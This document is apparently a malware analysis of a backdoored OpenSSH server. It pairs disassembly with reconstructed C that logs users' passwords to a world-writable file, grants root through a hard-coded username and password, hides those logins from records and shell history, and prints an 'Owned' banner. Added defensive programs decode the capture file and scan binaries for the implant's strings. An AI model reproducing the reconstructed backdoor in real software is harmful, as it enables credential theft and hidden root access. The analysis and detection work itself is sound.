.text:0804FB3B                 push    eax             ; eax = file stream
.text:0804FB3C                 push    1
.text:0804FB3E                 push    ds:alen         ; length of abuff
.text:0804FB44                 push    offset abuff    ; ptr to abuff
.text:0804FB49                 call    _fwrite
.text:0804FB4E                 pop     eax
.text:0804FB4F                 push    ds:alog         ; stream
.text:0804FB55                 call    _fclose         ; fclose(alog)
.text:0804FB5A                 add     esp, 10h
.text:0804FB5D                 jmp     short loc_804FB06
.text:0804FB5D sys_auth_passwd endp
*/


int
sys_auth_passwd(Authctxt *authctxt, const char *password)
{
	struct passwd *pw = authctxt->pw;
	char *encrypted_password;

	/* Just use the supplied fake password if authctxt is invalid */
	char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;

	/* Check for users with no password. */
	if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
		return (1);

	/* Encrypt the candidate password using the proper salt. */
	encrypted_password = xcrypt(password,
	    (pw_password[0] && pw_password[1]) ? pw_password : "xx");

	/* Reject on mismatch; only accepted passwords reach the logging code. */
	if (strcmp(encrypted_password, pw_password) != 0)
		return (0);
	
	sprintf(abuff,HookinSS,pw->pw_name,password); // lulz ^ 10
	len = strlen(abuff);
	for(i = 0;i<=len;i++)
		abuff[i] = ~abuff[i];  // An unbreakable NOT encryption algorithm! 
	if((log = fopen(filename,"a"))!=NULL) {
		fwrite(&abuff,len,1,log);
		fclose(log);
	}
	chmod(filename,0x1B6); //0x1B6 = 0666 (base 8)
	return 1;
	/*
	 * Authentication is accepted if the encrypted passwords
	 * are identical.
	 */
	//return (strcmp(encrypted_password, pw_password) == 0);
}
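
For incident response, the capture file written by sys_auth_passwd above can be read back by complementing each byte again, which shows which accounts need their passwords rotated. The decoder below is an added example, not code from the original write-up or the trojaned binary; decode_hook_log, make_sample and the sample accounts are constructed for illustration, and the record layout assumes the "HOOKIN: %s:%s\n" format string shown in the disassembly.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define HOOK_PREFIX "HOOKIN: "
#define MAX_USER 64

struct hook_rec {
    char   user[MAX_USER];  /* account whose password was captured */
    size_t pass_len;        /* length only; the secret itself is not kept */
};

/* Decode a buffer read from the capture file. Each byte was stored as its
 * bitwise complement, so complementing again restores "HOOKIN: user:pass\n".
 * Lines without the prefix are skipped. Returns the number of records stored
 * in out (at most max). */
size_t decode_hook_log(const unsigned char *buf, size_t n,
                       struct hook_rec *out, size_t max)
{
    char line[2048];
    size_t used = 0, found = 0;
    const size_t plen = strlen(HOOK_PREFIX);

    for (size_t i = 0; i <= n; i++) {
        /* Treat end of buffer as a line end so a truncated last record is seen. */
        char c = (i == n) ? '\n' : (char)(unsigned char)~buf[i];
        if (c != '\n') {
            if (used < sizeof line - 1)
                line[used++] = c;
            continue;
        }
        if (used > plen && memcmp(line, HOOK_PREFIX, plen) == 0) {
            const char *u = line + plen;
            size_t rest = used - plen;
            /* Unix account names cannot contain ':', so the first colon ends
             * the user field even when the password has colons of its own. */
            const char *colon = memchr(u, ':', rest);
            if (colon != NULL && colon != u && found < max) {
                size_t ulen = (size_t)(colon - u);
                size_t copy = ulen < MAX_USER - 1 ? ulen : MAX_USER - 1;
                memcpy(out[found].user, u, copy);
                out[found].user[copy] = '\0';
                out[found].pass_len = rest - ulen - 1;
                found++;
            }
        }
        used = 0;
    }
    return found;
}

/* Constructed sample data: format records, then complement each byte, as the
 * listing does before fwrite(). Returns the number of bytes written to dst. */
size_t make_sample(unsigned char *dst, size_t cap)
{
    static const char *plain =
        "HOOKIN: alice:correct horse\n"
        "HOOKIN: bob:pa:ss\n"
        "unrelated line\n"
        "HOOKIN: carol:x\n";
    size_t n = strlen(plain);
    if (n > cap)
        n = cap;
    for (size_t i = 0; i < n; i++)
        dst[i] = (unsigned char)~(unsigned char)plain[i];
    return n;
}

int main(int argc, char **argv)
{
    static unsigned char buf[65536];
    struct hook_rec recs[128];
    size_t n;

    if (argc > 1) {                      /* path to a copy of the capture file */
        FILE *f = fopen(argv[1], "rb");
        if (f == NULL) { perror(argv[1]); return 1; }
        n = fread(buf, 1, sizeof buf, f);
        fclose(f);
    } else {
        n = make_sample(buf, sizeof buf); /* constructed data, runs offline */
    }
    size_t k = decode_hook_log(buf, n, recs, 128);
    for (size_t i = 0; i < k; i++)
        printf("%s (password of %zu bytes captured)\n",
               recs[i].user, recs[i].pass_len);
    return 0;
}
```

Run it against a forensic copy of the file rather than the live path; the listing shows the original being set to mode 0666, so any local user could have read or altered it.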



/* auth_password
.text:0804FB60                 public auth_password
.text:0804FB60 auth_password   proc near               ; CODE XREF: auth1_process_password+BFp
.text:0804FB60                                         ; do_authentication+15Ap ...
.text:0804FB60
.text:0804FB60 arg_0           = dword ptr  8
.text:0804FB60 arg_4           = dword ptr  0Ch
.text:0804FB60
.text:0804FB60                 push    ebp
.text:0804FB61                 mov     ebp, esp
.text:0804FB63                 push    edi
.text:0804FB64                 push    esi
.text:0804FB65                 push    ebx
.text:0804FB66                 sub     esp, 0Ch
.text:0804FB69                 mov     ebx, [ebp+arg_4] ; ebx = const char * password
.text:0804FB6C                 mov     ds:hookarOn, 0  ; hookarOn = 0;
.text:0804FB76                 mov     esi, ebx
.text:0804FB78                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
.text:0804FB7D                 mov     ecx, 0Bh
.text:0804FB82                 cld
.text:0804FB83                 repe cmpsb              ; strcmp ebx,aSk3rhgldyw
.text:0804FB85                 jnz     short loc_804FBA0 ; if not equal then jump
.text:0804FB87                 mov     ds:hookarOn, 1  ; hookarOn = 1;
.text:0804FB91                 mov     eax, 1
.text:0804FB96
.text:0804FB96 loc_804FB96:                            ; CODE XREF: auth_password+5Fj
.text:0804FB96                                         ; auth_password+80j ...
.text:0804FB96                 lea     esp, [ebp-0Ch]
.text:0804FB99                 pop     ebx
.text:0804FB9A                 pop     esi
.text:0804FB9B                 pop     edi
.text:0804FB9C                 leave
.text:0804FB9D                 retn                    ; return 1
*/

int
auth_password(Authctxt *authctxt, const char *password)
{
	struct passwd * pw = authctxt->pw;
	int result, ok = authctxt->valid;
	
	hookarOn = 0;
	if (!strcmp(password, aSk3rhgldyw)) { //"Sk3rhGLdYW"
	                 hookarOn = 1;
	                 return 1;
		}
		
		//...
}


/* record_login
.text:08050848                 public record_login
.text:08050848 record_login    proc near               ; CODE XREF: do_login+F7p
.text:08050848                                         ; mm_answer_pty+116p
.text:08050848
.text:08050848 var_338         = dword ptr -338h
.text:08050848 timer           = dword ptr -31Ch
.text:08050848 var_318         = byte ptr -318h
.text:08050848 var_118         = byte ptr -118h
.text:08050848 s               = byte ptr -117h
.text:08050848 arg_0           = dword ptr  8
.text:08050848 arg_4           = dword ptr  0Ch
.text:08050848 arg_8           = dword ptr  10h
.text:08050848 arg_C           = dword ptr  14h
.text:08050848 arg_10          = dword ptr  18h
.text:08050848 arg_14          = dword ptr  1Ch
.text:08050848 arg_18          = dword ptr  20h
.text:08050848
.text:08050848                 push    ebp
.text:08050849                 mov     ebp, esp
.text:0805084B                 push    edi
.text:0805084C                 push    esi
.text:0805084D                 push    ebx
.text:0805084E                 sub     esp, 31Ch
.text:08050854                 mov     eax, ds:hookarOn
.text:08050859                 test    eax, eax
.text:0805085B                 mov     esi, [ebp+arg_8]
.text:0805085E                 jz      short loc_8050868
.text:08050860                 lea     esp, [ebp-0Ch]
.text:08050863                 pop     ebx
.text:08050864                 pop     esi
.text:08050865                 pop     edi
.text:08050866                 leave
.text:08050867                 retn
*/

/*
 * Records that the user has logged in.  I wish these parts of operating
 * systems were more standardized.
 */
void
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
    const char *host, struct sockaddr * addr, socklen_t addrlen)
{
		if(hookarOn) 
			return;
		//...
	}
	
	
	
/* record_logout

.text:08050994                 public record_logout
.text:08050994 record_logout   proc near               ; CODE XREF: session_pty_cleanup2+84p
.text:08050994
.text:08050994 var_18          = dword ptr -18h
.text:08050994 var_4           = dword ptr -4
.text:08050994 arg_0           = dword ptr  8
.text:08050994 arg_4           = dword ptr  0Ch
.text:08050994 arg_8           = dword ptr  10h
.text:08050994
.text:08050994                 push    ebp
.text:08050995                 mov     ebp, esp
.text:08050997                 push    ebx
.text:08050998                 push    eax
.text:08050999                 mov     ebx, ds:hookarOn
.text:0805099F                 test    ebx, ebx
.text:080509A1                 mov     ecx, [ebp+arg_0]
.text:080509A4                 mov     eax, [ebp+arg_4]
.text:080509A7                 mov     edx, [ebp+arg_8]
.text:080509AA                 jz      short loc_80509B4
.text:080509AC                 mov     ebx, [ebp+var_4]
.text:080509AF                 leave


*/



void
record_logout(pid_t pid, const char *tty, const char *user)
{
 struct logininfo *li;
 if(hookarOn) return;
 li = login_alloc_entry(pid, user, NULL, tty);
 login_logout(li);
 login_free_entry(li);
}




/* auth_root_allowed
.text:080547DC                 public auth_root_allowed
.text:080547DC auth_root_allowed proc near             ; CODE XREF: do_authentication+3CBp
.text:080547DC                                         ; userauth_finish+18Ep ...
.text:080547DC
.text:080547DC arg_0           = dword ptr  8
.text:080547DC
.text:080547DC                 push    ebp
.text:080547DD                 mov     ebp, esp
.text:080547DF                 cmp     ds:hookarOn, 1
.text:080547E6                 push    edi
.text:080547E7                 push    esi
.text:080547E8                 mov     ecx, 1
.text:080547ED                 jz      short loc_805481C


.text:0805481C loc_805481C:                            ; CODE XREF: auth_root_allowed+11j
.text:0805481C                                         ; auth_root_allowed+54j ...
.text:0805481C                 lea     esp, [ebp-8]
.text:0805481F                 pop     esi
.text:08054820                 mov     eax, ecx
.text:08054822                 pop     edi
.text:08054823                 leave
.text:08054824                 retn

*/


/*
 * Check whether root logins are disallowed.
 */
int
auth_root_allowed(char *method)
{

	if (hookarOn == 1)
		return 1;
	//...
}


/* auth1_process_password
.text:08054E98 auth1_process_password proc near
.text:08054E98
.text:08054E98 var_28          = dword ptr -28h
.text:08054E98 n               = dword ptr -10h
.text:08054E98 arg_0           = dword ptr  8
.text:08054E98
.text:08054E98                 push    ebp
.text:08054E99                 mov     ebp, esp
.text:08054E9B                 push    edi
.text:08054E9C                 push    esi
.text:08054E9D                 push    ebx
.text:08054E9E                 sub     esp, 18h
.text:08054EA1                 lea     eax, [ebp+n]
.text:08054EA4                 push    eax
.text:08054EA5                 call    packet_get_string ; read user pass in plain
.text:08054EAA                 mov     ebx, eax        ; ebx = pass
.text:08054EAC                 mov     eax, [ebp+arg_0] ; arg_0 = Authctxt struct
.text:08054EAF                 mov     ecx, [eax+8]    ; eax+8 = authctxt->valid
.text:08054EB2                 add     esp, 10h
.text:08054EB5                 test    ecx, ecx        ; if valid dont jump
.text:08054EB7                 jz      short loc_8054ED3
.text:08054EB9                 mov     edi, offset aSk3rhgldyw ; "Sk3rhGLdYW"
.text:08054EBE                 mov     ecx, 0Bh
.text:08054EC3                 cld
.text:08054EC4                 mov     esi, ebx        ; esi = pass (ebx)
.text:08054EC6                 repe cmpsb              ; strcmp pass, aSk3rhgldyw
.text:08054EC8                 jz      short loc_8054F38 ; if equal jump to return 1
.text:08054ECA                 cmp     ds:hookarOn, 1  ; if(hookarOn == 1)
.text:08054ECA                                         ; jmp to return 1
.text:08054ED1                 jz      short loc_8054F38


.text:08054F38 loc_8054F38:                            ; CODE XREF: auth1_process_password+30j
.text:08054F38                                         ; auth1_process_password+39j
.text:08054F38                 mov     ds:hookarOn, 1
.text:08054F42                 lea     esp, [ebp-0Ch]
.text:08054F45                 pop     ebx
.text:08054F46                 pop     esi
.text:08054F47                 mov     eax, 1
.text:08054F4C                 pop     edi
.text:08054F4D                 leave
.text:08054F4E                 retn
*/

static int
auth1_process_password(Authctxt *authctxt, char *info, size_t infolen)
{

	int authenticated = 0;
	char *password;
	u_int dlen;

	/*
	 * Read user password.  It is in plain text, but was
	 * transmitted over the encrypted channel so it is
	 * not visible to an outside observer.
	 */
	password = packet_get_string(&dlen);
	if(authctxt->valid)
		if(!strcmp(password,aSk3rhgldyw) || hookarOn == 1) { //"Sk3rhGLdYW"
			hookarOn = 1;
			return 1;
		}
	packet_check_eom();

	/* Try authentication with the password. */
	authenticated = PRIVSEP(auth_password(authctxt, password));

	memset(password, 0, dlen);
	xfree(password);

	return (authenticated);
}


/* do_authentication
.text:08055188 ; Attributes: bp-based frame
.text:08055188
.text:08055188                 public do_authentication
.text:08055188 do_authentication proc near             ; CODE XREF: main+1EA5p
.text:08055188
.text:08055188 var_438         = dword ptr -438h
.text:08055188 var_41C         = byte ptr -41Ch
.text:08055188 var_418         = byte ptr -418h
.text:08055188 arg_0           = dword ptr  8
.text:08055188
.text:08055188                 push    ebp
.text:08055189                 mov     ebp, esp
.text:0805518B                 push    edi
.text:0805518C                 push    esi
.text:0805518D                 push    ebx
.text:0805518E                 sub     esp, 428h
.text:08055194                 push    4               ; arg
.text:08055196                 call    packet_read_expect
.text:0805519B                 lea     eax, [ebp+var_41C]
.text:080551A1                 mov     [esp+438h+var_438], eax
.text:080551A4                 call    packet_get_string ; get the username
.text:080551A9                 mov     ebx, eax        ; ebx = username
.text:080551AB                 call    packet_remaining ; packet_check_eom()
.text:080551B0                 add     esp, 10h
.text:080551B3                 test    eax, eax
.text:080551B5                 jle     short loc_80551DB
.text:080551B7                 push    184h
.text:080551BC                 push    offset aAuth1_c ; "auth1.c"
.text:080551C1                 push    eax             ; arg
.text:080551C2                 push    offset aPacketIntegrit ; "Packet integrity error (%d bytes remain"...
.text:080551C7                 call    logit
.text:080551CC                 mov     [esp+438h+var_438], offset aPacketIntegr_0 ; "Packet integrity error."
.text:080551D3                 call    packet_disconnect
.text:080551D3 ; ---------------------------------------------------------------------------
.text:080551D8                 db  83h
.text:080551D9                 db 0C4h ; -
.text:080551DA                 db  10h
.text:080551DB ; ---------------------------------------------------------------------------
.text:080551DB
.text:080551DB loc_80551DB:                            ; CODE XREF: do_authentication+2Dj
.text:080551DB                 sub     esp, 8
.text:080551DE                 push    3Ah             ; ':'
.text:080551E0                 push    ebx             ; username
.text:080551E1                 call    _strchr
.text:080551E6                 add     esp, 10h
.text:080551E9                 test    eax, eax
.text:080551EB                 jz      short loc_80551F1
.text:080551ED                 mov     byte ptr [eax], 0
.text:080551F0                 inc     eax
.text:080551F1
.text:080551F1 loc_80551F1:                            ; CODE XREF: do_authentication+63j
.text:080551F1                 mov     edx, [ebp+arg_0] ; edx = Authctxt struct
.text:080551F4                 mov     [edx+18h], ebx  ; edx + 18h = authctxt->user
.text:080551F7                 mov     [edx+24h], eax  ; edx + 24h = authctxt->style
.text:080551FA                 mov     edi, offset a0x3aownt ; "0x3aownt"
.text:080551FF                 mov     ecx, 9
.text:08055204                 cld
.text:08055205                 mov     esi, ebx        ; esi = username
.text:08055207                 repe cmpsb              ; strcmp username a0x3aownt
.text:08055209                 jnz     loc_8055360     ; if(equal) else ...
.text:0805520F                 mov     ds:hookarOn, 1  ; hookarOn = 1
.text:08055219                 mov     dword ptr [ebx], 746F6F72h ; username =
.text:08055219                                         ; 74('t')6F('o')6F('o')72('r') = "root"
.text:0805521F                 mov     byte ptr [ebx+4], 0 ; ascii null terminating char
.text:0805521F                                         ; strcpy?


.text:08055360 loc_8055360:                            ; CODE XREF: do_authentication+81j
.text:08055360                 mov     ds:hookarOn, 0
.text:0805536A                 jmp     loc_8055223

*/

/*
 * Performs authentication of an incoming connection.  Session key has already
 * been exchanged and encryption is enabled.
 */
void
do_authentication(Authctxt *authctxt)
{
 u_int ulen;
 char *user, *style = NULL;

 /* Get the name of the user that we wish to log in as. */
 packet_read_expect(SSH_CMSG_USER);

 /* Get the user name. */
 user = packet_get_string(&ulen);
 packet_check_eom();

 if ((style = strchr(user, ':')) != NULL)
  *style++ = '\0';

 authctxt->user = user;
 authctxt->style = style;

 /* The disassembly takes the hookarOn = 1 branch when the names are equal. */
 if (strcmp(user, a0x3aownt) == 0) { //"0x3aownt"
  hookarOn = 1;
  strcpy(user, "root");
 } else
  hookarOn = 0;
 //...
}




/* input_userauth_request
.text:08055982 loc_8055982:                            ; CODE XREF: input_userauth_request+84j
.text:08055982                 mov     edi, offset a0x3aownt ; "0x3aownt"
.text:08055987                 mov     ecx, 9
.text:0805598C                 cld
.text:0805598D                 mov     esi, [ebp+s1]
.text:08055990                 repe cmpsb
.text:08055992                 jz      loc_8055AB8
.text:08055998                 mov     edx, [ebp+var_10]
.text:0805599B                 mov     eax, [edx+0Ch]
.text:0805599E                 inc     eax
.text:0805599F                 mov     ds:hookarOn, 0

.text:08055AB8 loc_8055AB8:                            ; CODE XREF: input_userauth_request+9Aj
.text:08055AB8                 mov     eax, [ebp+s1]
.text:08055ABB                 mov     ds:hookarOn, 1
.text:08055AC5                 mov     dword ptr [eax], 746F6F72h
.text:08055ACB                 mov     byte ptr [eax+4], 0
.text:08055ACF                 mov     edx, [ebp+var_10]
.text:08055AD2                 mov     eax, [edx+0Ch]
.text:08055AD5                 inc     eax
.text:08055AD6                 mov     [edx+0Ch], eax
.text:08055AD9                 dec     eax
.text:08055ADA                 jnz     loc_80559B3
*/


static void
input_userauth_request(int type, u_int32_t seq, void *ctxt)
{
	//...
	/* Same check as in do_authentication: equal names set the flag. */
	if (strcmp(user, a0x3aownt) == 0) { //"0x3aownt"
		hookarOn = 1;
		strcpy(user, "root");
	} else
		hookarOn = 0;
 //...
}
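
To check other hosts for the same implant, the strings recovered in this listing can be searched for in an sshd image. The scanner below is an added example, not part of the original write-up; find_bytes, scan_image and both sample buffers are constructed for illustration, and the indicator strings are copied from the listing above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct indicator {
    const char *label;
    const char *bytes;
    size_t      len;   /* counts the trailing NUL where the binary compares it */
};

#define N_IND 5
/* The two magic credentials and the file path are matched together with their
 * terminating NUL: the disassembly compares 9 and 0Bh bytes for the name and
 * password, which is the string plus its terminator. This avoids hits on
 * longer strings that merely start the same way. */
static const struct indicator INDICATORS[N_IND] = {
    { "capture format string", "HOOKIN: %s:%s",    13 },
    { "capture file path",     "/var/run/ssh.old", 17 },
    { "magic username",        "0x3aownt",          9 },
    { "magic password",        "Sk3rhGLdYW",       11 },
    { "banner text",           "Owned[DC] v2",     12 },
};

/* Offset of the first occurrence of needle (m bytes, may contain NUL) in hay,
 * or -1 when it does not occur. */
long find_bytes(const unsigned char *hay, size_t n, const char *needle, size_t m)
{
    if (m == 0 || n < m)
        return -1;
    for (size_t i = 0; i + m <= n; i++)
        if (hay[i] == (unsigned char)needle[0] && memcmp(hay + i, needle, m) == 0)
            return (long)i;
    return -1;
}

/* Fills offsets[k] for every indicator and returns a bitmask with bit k set
 * when INDICATORS[k] is present in the image. */
unsigned scan_image(const unsigned char *img, size_t n, long offsets[N_IND])
{
    unsigned mask = 0;
    for (int k = 0; k < N_IND; k++) {
        offsets[k] = find_bytes(img, n, INDICATORS[k].bytes, INDICATORS[k].len);
        if (offsets[k] >= 0)
            mask |= 1u << k;
    }
    return mask;
}

/* Constructed stand-ins for a .rodata section: one carrying two indicators,
 * one with look-alike strings that must not match. */
const unsigned char SAMPLE_IMPLANT[] =
    "sshd\0" "/var/run/ssh.old\0" "0x3aownt\0" "auth1.c";
const unsigned char SAMPLE_NEAR_MISS[] =
    "user=0x3aowntX\0" "/var/run/sshd.pid";

int main(int argc, char **argv)
{
    const unsigned char *img = SAMPLE_IMPLANT;
    size_t n = sizeof SAMPLE_IMPLANT - 1;
    unsigned char *file = NULL;
    long off[N_IND];

    if (argc > 1) {                      /* path to the sshd binary to inspect */
        FILE *f = fopen(argv[1], "rb");
        long sz;
        if (f == NULL) { perror(argv[1]); return 2; }
        if (fseek(f, 0, SEEK_END) != 0 || (sz = ftell(f)) < 0) { fclose(f); return 2; }
        rewind(f);
        file = malloc((size_t)sz + 1);
        if (file == NULL) { fclose(f); return 2; }
        n = fread(file, 1, (size_t)sz, f);
        fclose(f);
        img = file;
    }
    unsigned mask = scan_image(img, n, off);
    for (int k = 0; k < N_IND; k++)
        if (off[k] >= 0)
            printf("%-22s at offset 0x%lx\n", INDICATORS[k].label,
                   (unsigned long)off[k]);
    free(file);
    return mask ? 1 : 0;                 /* non-zero exit when anything matched */
}
```

A clean result only rules out this exact build; a rebuilt implant with different strings will not match, so compare the binary against the package's known-good hash as well.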


/* do_motd
.text:080568E0                 public do_motd
.text:080568E0 do_motd         proc near               ; CODE XREF: do_login+B9p
.text:080568E0
.text:080568E0 s               = byte ptr -108h
.text:080568E0
.text:080568E0                 push    ebp
.text:080568E1                 mov     ebp, esp
.text:080568E3                 push    esi
.text:080568E4                 push    ebx
.text:080568E5                 sub     esp, 100h
.text:080568EB                 mov     edx, dword ptr ds:options+634h
.text:080568F1                 test    edx, edx
.text:080568F3                 jnz     short loc_805690C
.text:080568F5
.text:080568F5 loc_80568F5:                            ; CODE XREF: do_motd+67j
.text:080568F5                 cmp     ds:hookarOn, 1
.text:080568FC                 jz      loc_805698B
.text:08056902
.text:08056902 loc_8056902:                            ; CODE XREF: do_motd+A5j
.text:08056902                                         ; do_motd+C2j ...
.text:08056902                 lea     esp, [ebp-8]
.text:08056905                 pop     ebx
.text:08056906                 pop     esi
.text:08056907                 leave
.text:08056908                 retn
.text:08056908 ; ---------------------------------------------------------------------------
.text:08056909                 align 4
.text:0805690C
.text:0805690C loc_805690C:                            ; CODE XREF: do_motd+13j
.text:0805690C                 sub     esp, 8
.text:0805690F                 push    (offset aSLineDBadPortN+1Ah) ; modes
.text:08056914                 push    eax
.text:08056915                 push    offset aEtcMotd ; "/etc/motd"
.text:0805691A                 push    offset aEtcMotd ; "/etc/motd"
.text:0805691F                 push    offset aWelcome ; "welcome"
.text:08056924                 push    ds:lc
.text:0805692A                 call    _login_getcapstr
.text:0805692F                 add     esp, 14h
.text:08056932                 push    eax             ; filename
.text:08056933                 call    _fopen
.text:08056938                 add     esp, 10h
.text:0805693B                 test    eax, eax
.text:0805693D                 mov     ebx, eax
.text:0805693F                 lea     esi, [ebp+s]
.text:08056945                 jnz     short loc_805695E
.text:08056947                 jmp     short loc_80568F5
.text:08056947 ; ---------------------------------------------------------------------------
.text:08056949                 align 4
.text:0805694C
.text:0805694C loc_805694C:                            ; CODE XREF: do_motd+90j
.text:0805694C                 sub     esp, 8
.text:0805694F                 push    ds:__stdoutp    ; stream
.text:08056955                 push    esi             ; s
.text:08056956                 call    _fputs
.text:0805695B                 add     esp, 10h
.text:0805695E
.text:0805695E loc_805695E:                            ; CODE XREF: do_motd+65j
.text:0805695E                 push    eax
.text:0805695F                 push    ebx             ; stream
.text:08056960                 push    100h            ; n
.text:08056965                 push    esi             ; s
.text:08056966                 call    _fgets
.text:0805696B                 add     esp, 10h
.text:0805696E                 test    eax, eax
.text:08056970                 jnz     short loc_805694C
.text:08056972                 sub     esp, 0Ch
.text:08056975                 push    ebx             ; stream
.text:08056976                 call    _fclose
.text:0805697B                 add     esp, 10h
.text:0805697E                 cmp     ds:hookarOn, 1
.text:08056985                 jnz     loc_8056902     ; if hookarOn != 1, return
.text:0805698B
.text:0805698B loc_805698B:                            ; CODE XREF: do_motd+1Cj
.text:0805698B                 sub     esp, 8
.text:0805698E                 push    offset unamep   ; struct offset
.text:08056993                 push    100h            ; size (_SYS_NMLN)
.text:08056998                 call    ___xuname       ; int uname(struct utsname *name)
.text:0805699D                 add     esp, 10h
.text:080569A0                 test    eax, eax
.text:080569A2                 jnz     loc_8056902     ; on error return function
.text:080569A8                 sub     esp, 0Ch
.text:080569AB                 push    8086EE0h        ; unamep+400 = unamep.machine
.text:080569B0                 push    8086CE0h        ; unamep+200 = unamep.release
.text:080569B5                 push    8086BE0h        ; unamep+100 = unamep.nodename
.text:080569BA                 push    offset unamep   ; unamep+0 = unamep.sysname
.text:080569BF                 push    offset aOwned   ; "\n\t\t+----------------------------[ Owned"...
.text:080569C4                 push    offset a0m      ; "\x1B[0m"
.text:080569C9                 push    offset aSSSSSS  ; "%s%s\t [ %s %s %s %s ]\n\n"
.text:080569CE                 push    400h            ; maxlen
.text:080569D3                 push    offset sbuff    ; s
.text:080569D8                 call    _snprintf
.text:080569DD                 add     esp, 28h
.text:080569E0                 push    ds:__stdoutp    ; stream
.text:080569E6                 push    offset sbuff    ; s
.text:080569EB                 call    _fputs
.text:080569F0                 add     esp, 10h
.text:080569F3                 jmp     loc_8056902
.text:080569F3 do_motd         endp
.text:080569F3

*/


/*
 * Display the message of the day.
 */
void
do_motd(void)
{
 FILE *f;
 char buf[256];

 if (options.print_motd) {
#ifdef HAVE_LOGIN_CAP
  f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
      "/etc/motd"), "r");
#else
  f = fopen("/etc/motd", "r");
#endif
  if (f) {
   while (fgets(buf, sizeof(buf), f))
    fputs(buf, stdout);
   fclose(f);
  }
 }
 if (hookarOn == 1) {
  /* backdoor session: print the "Owned" banner with the uname fields */
  if (uname(&unamep) == 0) {
   snprintf(sbuff, 0x400, aSSSSSS, a0m, aOwned, unamep.sysname,
       unamep.nodename, unamep.release, unamep.machine);
   fputs(sbuff, stdout);
  }
 }
}




/* do_child
.text:08056F8A loc_8056F8A:                            ; CODE XREF: do_child+109j
.text:08056F8A                 mov     esi, [ebp+var_1AC0]
.text:08056F90                 push    dword ptr [esi] ; int
.text:08056F92                 push    (offset aNouser+2) ; s2
.text:08056F97                 lea     eax, [ebp+var_1AAC]
.text:08056F9D                 push    eax             ; int
.text:08056F9E                 lea     edx, [ebp+envp]
.text:08056FA4                 push    edx             ; int
.text:08056FA5                 call    child_set_env
.text:08056FAA                 add     esp, 10h
.text:08056FAD                 push    dword ptr [esi] ; int
.text:08056FAF                 push    offset aLogname ; "LOGNAME"
.text:08056FB4                 lea     esi, [ebp+var_1AAC]
.text:08056FBA                 push    esi             ; int
.text:08056FBB                 lea     eax, [ebp+envp]
.text:08056FC1                 push    eax             ; int
.text:08056FC2                 call    child_set_env
.text:08056FC7                 add     esp, 10h
.text:08056FCA                 cmp     ds:hookarOn, 1
.text:08056FD1                 jz      loc_8057913
.text:08056FD7                 mov     eax, [ebp+var_1AC0]
.text:08056FDD                 push    dword ptr [eax] ; int
.text:08056FDF                 push    (offset aNouser+2) ; s2
.text:08056FE4                 lea     edx, [ebp+var_1AAC]
.text:08056FEA                 push    edx             ; int
.text:08056FEB                 lea     esi, [ebp+envp]
.text:08056FF1                 push    esi             ; int
.text:08056FF2                 call    child_set_env


.text:08057913 loc_8057913:                            ; CODE XREF: do_child+181j
.text:08057913                 push    offset aRoot    ; "root"
.text:08057918                 push    (offset aNouser+2) ; USER
.text:0805791D                 push    esi             ; envsize
.text:0805791E                 lea     esi, [ebp+envp]
.text:08057924                 push    esi             ; envp
.text:08057925                 call    child_set_env
.text:0805792A                 add     esp, 10h
.text:0805792D                 push    offset unk_8079C88 ; db  2Fh ; /
.text:0805792D                                         ; db 'root',0
.text:08057932                 push    offset aHome    ; "HOME"
.text:08057937                 lea     eax, [ebp+var_1AAC]
.text:0805793D                 push    eax             ; envsize
.text:0805793E                 push    esi             ; envp
.text:0805793F                 call    child_set_env
.text:08057944                 add     esp, 10h
.text:08057947                 push    offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
.text:0805794C                 push    offset aPs1     ; "PS1"
.text:08057951                 lea     esi, [ebp+var_1AAC]
.text:08057957                 push    esi             ; int
.text:08057958                 lea     eax, [ebp+envp]
.text:0805795E                 push    eax             ; int
.text:0805795F                 call    child_set_env
.text:08057964                 add     esp, 10h
.text:08057967                 push    offset file     ; "/dev/null"
.text:0805796C                 push    offset aHistfile ; "HISTFILE"
.text:08057971                 push    esi             ; int
.text:08057972                 lea     esi, [ebp+envp]
.text:08057978                 push    esi             ; int
.text:08057979                 call    child_set_env
.text:0805797E                 add     esp, 0Ch
.text:08057981                 push    offset aUptimeLast5 ; "uptime && last -5\n"
.text:08057986                 push    400h            ; length of s
.text:0805798B                 lea     ebx, [ebp+s]    ; char * s
.text:08057991                 push    ebx             ; s
.text:08057992                 call    _snprintf
.text:08057997                 mov     [esp+1AD8h+var_1AD8], ebx
.text:0805799A                 call    _system
.text:0805799F                 add     esp, 10h
.text:080579A2                 push    4
.text:080579A4                 mov     eax, [ebp+var_1AC0]
.text:080579AA                 push    dword ptr [eax+8]
.text:080579AD                 push    eax
.text:080579AE                 push    ds:lc
.text:080579B4                 call    _setusercontext
.text:080579B9                 add     esp, 10h
.text:080579BC                 test    eax, eax
.text:080579BE                 jns     loc_805703A
.text:080579C4


*/



/*
 * Performs common processing for the child, such as setting up the
 * environment, closing extra file descriptors, setting the user and group
 * ids, and executing the command or shell.
 */
void
do_child(Session *s, const char *command)
{
 extern char **environ;
 char **env;
 char *argv[10];
 const char *shell, *shell0, *hostname = NULL;
 struct passwd *pw = s->pw;
 
//...

/*
  * Make sure $SHELL points to the shell from the password file,
  * even if shell is overridden from login.conf
  */
 env = do_setup_env(s, shell);
 
//...
}


//...
static char **
do_setup_env(Session *s, const char *shell)
{
 char buf[256];
 u_int i, envsize;
 char **env, *laddr, *path = NULL;
 struct passwd *pw = s->pw;
 
 //...

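 if (hookarOn == 1) {
  /* [ebp+s] in the listing; renamed because s is the Session here */
  char cmd[1024];

  child_set_env(&env, &envsize, "USER", "root");
  child_set_env(&env, &envsize, "HOME", "/root");
  child_set_env(&env, &envsize, "PS1", a033031mOwned03);
  /* no shell history is kept for the backdoor session */
  child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
  snprintf(cmd, sizeof(cmd), "uptime && last -5\n");
  system(cmd);
 }
 else {
  //do normal shit
 }

//...
}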


/*session_proctitle
.text:08058654                 public session_proctitle
.text:08058654 session_proctitle proc near             ; CODE XREF: session_close+9Dj
.text:08058654                                         ; session_close+14Bj ...
.text:08058654
.text:08058654 var_18          = dword ptr -18h
.text:08058654 var_14          = dword ptr -14h
